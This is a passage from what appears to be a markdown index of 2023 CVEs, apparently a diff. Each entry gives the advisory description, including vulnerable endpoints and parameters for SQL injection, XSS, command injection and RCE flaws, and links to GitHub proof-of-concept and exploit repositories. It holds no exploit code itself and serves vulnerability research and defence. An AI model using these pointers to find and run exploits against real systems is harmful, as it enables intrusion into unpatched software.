[horizon3ai/CVE-2023-48788](https://github.com/horizon3ai/CVE-2023-48788) + +### CVE-2023-48842 (2023-12-01) + +D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi. + + +- [creacitysec/CVE-2023-48842](https://github.com/creacitysec/CVE-2023-48842) + +### CVE-2023-48849 (2023-12-06) + +Ruijie EG Series Routers version EG_3.0(1)B11P216 and before allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering. + + +- [delsploit/CVE-2023-48849](https://github.com/delsploit/CVE-2023-48849) + +### CVE-2023-48858 (2024-01-17) + +A Cross-site scripting (XSS) vulnerability in login page php code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part. + + +- [Shumerez/CVE-2023-48858](https://github.com/Shumerez/CVE-2023-48858) + +### CVE-2023-48866 (2023-12-04) + +A Cross-Site Scripting (XSS) vulnerability in the recipe preparation component within /api/objects/recipes and note component within /api/objects/shopping_lists/ of Grocy <= 4.0.3 allows attackers to obtain the victim's cookies. + + +- [nitipoom-jar/CVE-2023-48866](https://github.com/nitipoom-jar/CVE-2023-48866) + +### CVE-2023-48974 (2024-02-08) + +Cross Site Scripting vulnerability in Axigen WebMail prior to 10.3.3.61 allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter. + + +- [vinnie1717/CVE-2023-48974](https://github.com/vinnie1717/CVE-2023-48974) + +### CVE-2023-48981 +- [tristao-marinho/CVE-2023-48981](https://github.com/tristao-marinho/CVE-2023-48981) + +### CVE-2023-48982 +- [tristao-marinho/CVE-2023-48982](https://github.com/tristao-marinho/CVE-2023-48982) + +### CVE-2023-48983 +- [tristao-marinho/CVE-2023-48983](https://github.com/tristao-marinho/CVE-2023-48983) + +### CVE-2023-49002 (2023-12-27) + +An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity. + + +- [actuator/com.sinous.voice.dialer](https://github.com/actuator/com.sinous.voice.dialer) + +### CVE-2023-49003 (2023-12-27) + +An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity. + + +- [actuator/com.simplemobiletools.dialer](https://github.com/actuator/com.simplemobiletools.dialer) + +### CVE-2023-49038 (2024-01-29) + +Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root. + + +- [christopher-pace/CVE-2023-49038](https://github.com/christopher-pace/CVE-2023-49038) + +### CVE-2023-49052 (2023-11-30) + +File Upload vulnerability in Microweber v.2.0.4 allows a remote attacker to execute arbitrary code via a crafted script to the file upload function in the created forms component. + + +- [Cyber-Wo0dy/CVE-2023-49052](https://github.com/Cyber-Wo0dy/CVE-2023-49052) + +### CVE-2023-49070 (2023-12-05) + +\nPre-auth RCE in Apache Ofbiz 18.12.09.\n\nIt's due to XML-RPC no longer maintained still present.\nThis issue affects Apache OFBiz: before 18.12.10. \nUsers are recommended to upgrade to version 18.12.10\n\n + + +- [abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC) +- [0xrobiul/CVE-2023-49070](https://github.com/0xrobiul/CVE-2023-49070) +- [D0g3-8Bit/OFBiz-Attack](https://github.com/D0g3-8Bit/OFBiz-Attack) +- [UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz](https://github.com/UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz) +- [yukselberkay/CVE-2023-49070_CVE-2023-51467](https://github.com/yukselberkay/CVE-2023-49070_CVE-2023-51467) +- [Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467](https://github.com/Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467) + +### CVE-2023-49103 (2023-11-21) + +An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure. + + +- [creacitysec/CVE-2023-49103](https://github.com/creacitysec/CVE-2023-49103) +- [merlin-ke/OwnCloud-CVE-2023-49103](https://github.com/merlin-ke/OwnCloud-CVE-2023-49103) +- [d0rb/CVE-2023-49103](https://github.com/d0rb/CVE-2023-49103) + +### CVE-2023-49105 (2023-11-21) + +An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0. + + +- [ambionics/owncloud-exploits](https://github.com/ambionics/owncloud-exploits) + +### CVE-2023-49313 (2023-11-28) + +A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data. + + +- [louiselalanne/CVE-2023-49313](https://github.com/louiselalanne/CVE-2023-49313) + +### CVE-2023-49314 (2023-11-28) + +Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and EnableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack. + + +- [louiselalanne/CVE-2023-49314](https://github.com/louiselalanne/CVE-2023-49314) + +### CVE-2023-49339 (2024-02-13) + +Ellucian Banner 9.17 allows Insecure Direct Object Reference (IDOR) via a modified bannerId to the /StudentSelfService/ssb/studentCard/retrieveData endpoint. + + +- [3zizme/CVE-2023-49339](https://github.com/3zizme/CVE-2023-49339) + +### CVE-2023-49438 (2023-12-26) + +An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes. + + +- [brandon-t-elliott/CVE-2023-49438](https://github.com/brandon-t-elliott/CVE-2023-49438) + +### CVE-2023-49453 (2024-03-12) + +Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php. + + +- [nitipoom-jar/CVE-2023-49453](https://github.com/nitipoom-jar/CVE-2023-49453) + +### CVE-2023-49471 (2024-01-10) + +Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code. + + +- [zunak/CVE-2023-49471](https://github.com/zunak/CVE-2023-49471) + +### CVE-2023-49496 +- [HuangYanQwQ/CVE-2023-49496](https://github.com/HuangYanQwQ/CVE-2023-49496) + +### CVE-2023-49539 (2024-03-01) + +Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/category. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the category parameter. + + +- [geraldoalcantara/CVE-2023-49539](https://github.com/geraldoalcantara/CVE-2023-49539) + +### CVE-2023-49540 (2024-03-01) + +Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/history. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the history parameter. + + +- [geraldoalcantara/CVE-2023-49540](https://github.com/geraldoalcantara/CVE-2023-49540) + +### CVE-2023-49543 (2024-03-01) + +Incorrect access control in Book Store Management System v1 allows attackers to access unauthorized pages and execute administrative functions without authenticating. + + +- [geraldoalcantara/CVE-2023-49543](https://github.com/geraldoalcantara/CVE-2023-49543) + +### CVE-2023-49544 (2024-03-01) + +A local file inclusion (LFI) in Customer Support System v1 allows attackers to include internal PHP files and gain unauthorized acces via manipulation of the page= parameter at /customer_support/index.php. + + +- [geraldoalcantara/CVE-2023-49544](https://github.com/geraldoalcantara/CVE-2023-49544) + +### CVE-2023-49545 (2024-03-01) + +A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49545](https://github.com/geraldoalcantara/CVE-2023-49545) + +### CVE-2023-49546 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php. + + +- [geraldoalcantara/CVE-2023-49546](https://github.com/geraldoalcantara/CVE-2023-49546) + +### CVE-2023-49547 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the username parameter at /customer_support/ajax.php?action=login. + + +- [geraldoalcantara/CVE-2023-49547](https://github.com/geraldoalcantara/CVE-2023-49547) + +### CVE-2023-49548 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the lastname parameter at /customer_support/ajax.php?action=save_user. + + +- [geraldoalcantara/CVE-2023-49548](https://github.com/geraldoalcantara/CVE-2023-49548) + +### CVE-2023-49606 (2024-05-01) + +A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability. + + +- [d0rb/CVE-2023-49606](https://github.com/d0rb/CVE-2023-49606) + +### CVE-2023-49950 (2024-02-03) + +The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure. + + +- [shrikeinfosec/cve-2023-49950](https://github.com/shrikeinfosec/cve-2023-49950) + +### CVE-2023-49954 (2023-12-25) + +The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address. + + +- [CVE-2023-49954/CVE-2023-49954.github.io](https://github.com/CVE-2023-49954/CVE-2023-49954.github.io) + +### CVE-2023-49964 (2023-12-11) + +An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873. + + +- [mbadanoiu/CVE-2023-49964](https://github.com/mbadanoiu/CVE-2023-49964) + +### CVE-2023-49965 (2024-04-05) + +SpaceX Starlink Wi-Fi router Gen 2 before 2023.48.0 allows XSS via the ssid and password parameters on the Setup Page. + + +- [yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS](https://github.com/yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS) + +### CVE-2023-49968 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/manage_department.php. + + +- [geraldoalcantara/CVE-2023-49968](https://github.com/geraldoalcantara/CVE-2023-49968) + +### CVE-2023-49969 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/index.php?page=edit_customer. + + +- [geraldoalcantara/CVE-2023-49969](https://github.com/geraldoalcantara/CVE-2023-49969) + +### CVE-2023-49970 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the subject parameter at /customer_support/ajax.php?action=save_ticket. + + +- [geraldoalcantara/CVE-2023-49970](https://github.com/geraldoalcantara/CVE-2023-49970) + +### CVE-2023-49971 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter at /customer_support/index.php?page=customer_list. + + +- [geraldoalcantara/CVE-2023-49971](https://github.com/geraldoalcantara/CVE-2023-49971) + +### CVE-2023-49973 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter at /customer_support/index.php?page=customer_list. + + +- [geraldoalcantara/CVE-2023-49973](https://github.com/geraldoalcantara/CVE-2023-49973) + +### CVE-2023-49974 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contact parameter at /customer_support/index.php?page=customer_list. + + +- [geraldoalcantara/CVE-2023-49974](https://github.com/geraldoalcantara/CVE-2023-49974) + +### CVE-2023-49976 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the subject parameter at /customer_support/index.php?page=new_ticket. + + +- [geraldoalcantara/CVE-2023-49976](https://github.com/geraldoalcantara/CVE-2023-49976) + +### CVE-2023-49977 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the address parameter at /customer_support/index.php?page=new_customer. + + +- [geraldoalcantara/CVE-2023-49977](https://github.com/geraldoalcantara/CVE-2023-49977) + +### CVE-2023-49978 (2024-03-06) + +Incorrect access control in Customer Support System v1 allows non-administrator users to access administrative pages and execute actions reserved for administrators. + + +- [geraldoalcantara/CVE-2023-49978](https://github.com/geraldoalcantara/CVE-2023-49978) + +### CVE-2023-49979 (2024-03-06) + +A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49979](https://github.com/geraldoalcantara/CVE-2023-49979) + +### CVE-2023-49980 (2024-03-06) + +A directory listing vulnerability in Best Student Result Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49980](https://github.com/geraldoalcantara/CVE-2023-49980) + +### CVE-2023-49981 (2024-03-06) + +A directory listing vulnerability in School Fees Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49981](https://github.com/geraldoalcantara/CVE-2023-49981) + +### CVE-2023-49982 (2024-03-06) + +Broken access control in the component /admin/management/users of School Fees Management System v1.0 allows attackers to escalate privileges and perform Administrative actions, including adding and deleting user accounts. + + +- [geraldoalcantara/CVE-2023-49982](https://github.com/geraldoalcantara/CVE-2023-49982) + +### CVE-2023-49983 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [geraldoalcantara/CVE-2023-49983](https://github.com/geraldoalcantara/CVE-2023-49983) + +### CVE-2023-49984 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in the component /management/settings of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [geraldoalcantara/CVE-2023-49984](https://github.com/geraldoalcantara/CVE-2023-49984) + +### CVE-2023-49985 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cname parameter. + + +- [geraldoalcantara/CVE-2023-49985](https://github.com/geraldoalcantara/CVE-2023-49985) + +### CVE-2023-49986 (2024-03-07) + +A cross-site scripting (XSS) vulnerability in the component /admin/parent of School Fees Management System 1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [geraldoalcantara/CVE-2023-49986](https://github.com/geraldoalcantara/CVE-2023-49986) + +### CVE-2023-49987 (2024-03-07) + +A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter. + + +- [geraldoalcantara/CVE-2023-49987](https://github.com/geraldoalcantara/CVE-2023-49987) + +### CVE-2023-49988 (2024-03-07) + +Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the npss parameter at rooms.php. + + +- [geraldoalcantara/CVE-2023-49988](https://github.com/geraldoalcantara/CVE-2023-49988) + +### CVE-2023-49989 (2024-03-07) + +Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php. + + +- [geraldoalcantara/CVE-2023-49989](https://github.com/geraldoalcantara/CVE-2023-49989) + +### CVE-2023-50029 (2024-06-24) + +PHP Injection vulnerability in the module "M4 PDF Extensions" (m4pdf) up to version 3.3.2 from PrestaAddons for PrestaShop allows attackers to run arbitrary code via the M4PDF::saveTemplate() method. + + +- [absholi7ly/PHP-Injection-in-M4-PDF-Extensions](https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions) + +### CVE-2023-50070 (2023-12-29) + +Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject. + + +- [geraldoalcantara/CVE-2023-50070](https://github.com/geraldoalcantara/CVE-2023-50070) + +### CVE-2023-50071 (2023-12-29) + +Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name. + + +- [geraldoalcantara/CVE-2023-50071](https://github.com/geraldoalcantara/CVE-2023-50071) + +### CVE-2023-50072 (2024-01-13) + +A Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) With Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS. + + +- [ahrixia/CVE-2023-50072](https://github.com/ahrixia/CVE-2023-50072) + +### CVE-2023-50094 (2024-01-01) + +reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output. + + +- [Zierax/CVE-2023-50094_POC](https://github.com/Zierax/CVE-2023-50094_POC) + +### CVE-2023-50131 +- [sajaljat/CVE-2023-50131](https://github.com/sajaljat/CVE-2023-50131) + +### CVE-2023-50132 +- [sajaljat/CVE-2023-50132](https://github.com/sajaljat/CVE-2023-50132) + +### CVE-2023-50164 (2023-12-07) + +An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.\nUsers are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.\n + + +- [minhbao15677/CVE-2023-50164](https://github.com/minhbao15677/CVE-2023-50164) +- [jakabakos/CVE-2023-50164-Apache-Struts-RCE](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE) +- [bcdannyboy/CVE-2023-50164](https://github.com/bcdannyboy/CVE-2023-50164) +- [dwisiswant0/cve-2023-50164-poc](https://github.com/dwisiswant0/cve-2023-50164-poc) +- [helsecert/cve-2023-50164](https://github.com/helsecert/cve-2023-50164) +- [Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE](https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE) +- [Trackflaw/CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker) +- [miles3719/cve-2023-50164](https://github.com/miles3719/cve-2023-50164) +- [aaronm-sysdig/cve-2023-50164](https://github.com/aaronm-sysdig/cve-2023-50164) +- [snyk-labs/CVE-2023-50164-POC](https://github.com/snyk-labs/CVE-2023-50164-POC) +- [sunnyvale-it/CVE-2023-50164-PoC](https://github.com/sunnyvale-it/CVE-2023-50164-PoC) +- [AsfandAliMemon25/CVE-2023-50164Analysis-](https://github.com/AsfandAliMemon25/CVE-2023-50164Analysis-) +- [NikitaPark/CVE-2023-50164-PoC](https://github.com/NikitaPark/CVE-2023-50164-PoC) +- [Trackflaw/CVE-2024-10924-Wordpress-Docker](https://github.com/Trackflaw/CVE-2024-10924-Wordpress-Docker) + +### CVE-2023-50226 (2024-05-03) + +Parallels Desktop Updater Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Updater service. By creating a symbolic link, an attacker can abuse the service to move arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.\n. Was ZDI-CAN-21227. + + +- [kn32/parallels-file-move-privesc](https://github.com/kn32/parallels-file-move-privesc) + +### CVE-2023-50245 (2023-12-11) + +OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1. + + +- [200101WhoAmI/CVE-2023-50245](https://github.com/200101WhoAmI/CVE-2023-50245) + +### CVE-2023-50254 (2023-12-22) + +Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. + + +- [febinrev/deepin-linux_reader_RCE-exploit](https://github.com/febinrev/deepin-linux_reader_RCE-exploit) + +### CVE-2023-50386 (2024-02-09) + +Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.\n\nIn the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API.\nWhen backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups).\nIf the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted.\n\nWhen Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries.\nUsers are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.\nIn these versions, the following protections have been added:\n\n * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader.\n * The Backup API restricts saving backups to directories that are used in the ClassLoader.\n\n + + +- [vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC](https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC) + +### CVE-2023-50387 (2024-02-14) + +Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records. + + +- [knqyf263/CVE-2023-50387](https://github.com/knqyf263/CVE-2023-50387) +- [Meirelez/SSR-DNSSEC](https://github.com/Meirelez/SSR-DNSSEC) +- [Pablodiz/CVE-2023-50387](https://github.com/Pablodiz/CVE-2023-50387) + +### CVE-2023-50465 (2023-12-11) + +A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user. + + +- [Ev3rR3d/CVE-2023-50465](https://github.com/Ev3rR3d/CVE-2023-50465) + +### CVE-2023-50564 (2023-12-14) + +An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file. + + +- [Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC](https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC) +- [ipuig/CVE-2023-50564](https://github.com/ipuig/CVE-2023-50564) +- [rwexecute/CVE-2023-50564](https://github.com/rwexecute/CVE-2023-50564) +- [thefizzyfish/CVE-2023-50564-pluck](https://github.com/thefizzyfish/CVE-2023-50564-pluck) +- [Mrterrestrial/CVE-2023-50564](https://github.com/Mrterrestrial/CVE-2023-50564) +- [0xDTC/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564](https://github.com/0xDTC/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564) +- [xpltive/CVE-2023-50564](https://github.com/xpltive/CVE-2023-50564) + +### CVE-2023-50596 +- [chandraprarikraj/CVE-2023-50596](https://github.com/chandraprarikraj/CVE-2023-50596) + +### CVE-2023-50643 (2024-01-09) + +An issue in Evernote Evernote for MacOS v.10.68.2 allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components. + + +- [giovannipajeu1/CVE-2023-50643](https://github.com/giovannipajeu1/CVE-2023-50643) + +### CVE-2023-50685 (2024-05-02) + +An issue in Hipcam Cameras RealServer v.1.0 allows a remote attacker to cause a denial of service via a crafted script to the client_port parameter. + + +- [MaximilianJungblut/Hipcam-RTSP-Format-Validation-Vulnerability](https://github.com/MaximilianJungblut/Hipcam-RTSP-Format-Validation-Vulnerability) + +### CVE-2023-50780 (2024-10-14) + +Apache ActiveMQ Artemis allows access to diagnostic information and controls through MBeans, which are also exposed through the authenticated Jolokia endpoint. Before version 2.29.0, this also included the Log4J2 MBean. This MBean is not meant for exposure to non-administrative users. This could eventually allow an authenticated attacker to write arbitrary files to the filesystem and indirectly achieve RCE.\n\n\nUsers are recommended to upgrade to version 2.29.0 or later, which fixes the issue. + + +- [mbadanoiu/CVE-2023-50780](https://github.com/mbadanoiu/CVE-2023-50780) + +### CVE-2023-50868 (2024-02-14) + +The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations. + + +- [Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack](https://github.com/Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack) + +### CVE-2023-50917 (2023-12-15) + +MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. + + +- [Chocapikk/CVE-2023-50917](https://github.com/Chocapikk/CVE-2023-50917) + +### CVE-2023-51000 +- [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000) + +### CVE-2023-51073 (2024-01-11) + +An issue in Buffalo LS210D v.1.78-0.03 allows a remote attacker to execute arbitrary code via the Firmware Update Script at /etc/init.d/update_notifications.sh. + + +- [christopher-pace/CVE-2023-51073](https://github.com/christopher-pace/CVE-2023-51073) + +### CVE-2023-51119 +- [OscarAkaElvis/CVE-2023-51119](https://github.com/OscarAkaElvis/CVE-2023-51119) + +### CVE-2023-51126 (2024-01-10) + +Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter. + + +- [risuxx/CVE-2023-51126](https://github.com/risuxx/CVE-2023-51126) + +### CVE-2023-51127 (2024-01-10) + +FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file. + + +- [risuxx/CVE-2023-51127](https://github.com/risuxx/CVE-2023-51127) + +### CVE-2023-51214 +- [chandraprarikraj/CVE-2023-51214](https://github.com/chandraprarikraj/CVE-2023-51214) + +### CVE-2023-51281 (2024-03-07) + +Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script firstname, "lastname", "middlename", "contact" and address parameters. + + +- [geraldoalcantara/CVE-2023-51281](https://github.com/geraldoalcantara/CVE-2023-51281) + +### CVE-2023-51385 (2023-12-18) + +In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. + + +- [vin01/poc-proxycommand-vulnerable](https://github.com/vin01/poc-proxycommand-vulnerable) +- [FeatherStark/CVE-2023-51385](https://github.com/FeatherStark/CVE-2023-51385) +- [watarium/poc-cve-2023-51385](https://github.com/watarium/poc-cve-2023-51385) +- [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385) +- [LtmThink/CVE-2023-51385_test](https://github.com/LtmThink/CVE-2023-51385_test) +- [WLaoDuo/CVE-2023-51385_poc-test](https://github.com/WLaoDuo/CVE-2023-51385_poc-test) +- [power1314520/CVE-2023-51385_test](https://github.com/power1314520/CVE-2023-51385_test) +- [WOOOOONG/CVE-2023-51385](https://github.com/WOOOOONG/CVE-2023-51385) +- [uccu99/CVE-2023-51385](https://github.com/uccu99/CVE-2023-51385) +- [julienbrs/exploit-CVE-2023-51385](https://github.com/julienbrs/exploit-CVE-2023-51385) +- [julienbrs/malicious-exploit-CVE-2023-51385](https://github.com/julienbrs/malicious-exploit-CVE-2023-51385) +- [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385) +- [farliy-hacker/CVE-2023-51385](https://github.com/farliy-hacker/CVE-2023-51385) +- [farliy-hacker/CVE-2023-51385-save](https://github.com/farliy-hacker/CVE-2023-51385-save) +- [2048JiaLi/CVE-2023-51385](https://github.com/2048JiaLi/CVE-2023-51385) +- [thinkliving2020/CVE-2023-51385-](https://github.com/thinkliving2020/CVE-2023-51385-) +- [c0deur/CVE-2023-51385](https://github.com/c0deur/CVE-2023-51385) +- [endasugrue/CVE-2023-51385_poc](https://github.com/endasugrue/CVE-2023-51385_poc) 